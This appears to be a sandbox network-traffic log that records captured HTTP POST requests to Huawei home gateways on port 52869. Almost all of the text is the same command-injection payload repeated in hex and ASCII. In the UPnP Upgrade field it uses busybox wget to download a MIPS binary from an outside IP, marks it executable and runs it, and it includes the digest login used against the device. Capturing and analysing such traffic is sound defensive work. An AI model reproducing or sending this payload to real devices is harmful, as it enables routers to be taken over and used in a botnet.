Source: unknown	Network traffic detected: HTTP traffic on port 46204 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48824 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54738 -> 52869

Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
